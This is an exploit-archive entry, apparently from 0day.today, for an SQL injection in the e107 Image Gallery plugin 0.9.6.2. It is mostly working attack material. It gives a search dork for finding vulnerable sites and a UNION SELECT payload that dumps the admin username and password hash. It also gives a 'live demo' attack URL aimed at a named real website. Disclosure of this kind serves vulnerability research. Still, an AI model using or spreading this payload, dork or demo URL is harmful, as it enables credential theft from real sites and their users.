id: 3711
date: 09/20/2008
title: e107 Plugin Image Gallery 0.9.6.2 (image) SQL Injection Vulnerability
author: boom3rang
cves: 

=====================================================================
e107 Plugin Image Gallery 0.9.6.2 (image) SQL Injection Vulnerability
=====================================================================


- Download Plugin:  http://www.akirapowered.org/download.php?view.73

- Dork:
inurl:image_gallery.php?page=image-detail

- POC:
http://www.site.com/e107_Path/image_gallery/image_gallery.php?page=image-detail&album=1&image=[exploit]

- Exploit:
-9999+UNION+SELECT+concat_ws(char(58),user_name,user_password)KHG+from+e107_user+where+user_id=1--

- Live demo:
http://www.ifitbleeds.net/e107_plugins/image_gallery/image_gallery.php?page=image-detail&album=1&image=-9999+UNION+SELECT+concat_ws(char(58),user_name,user_password)KHG+from+e107_user+where+user_id=1--




#  0day.today [2023-03-27]  #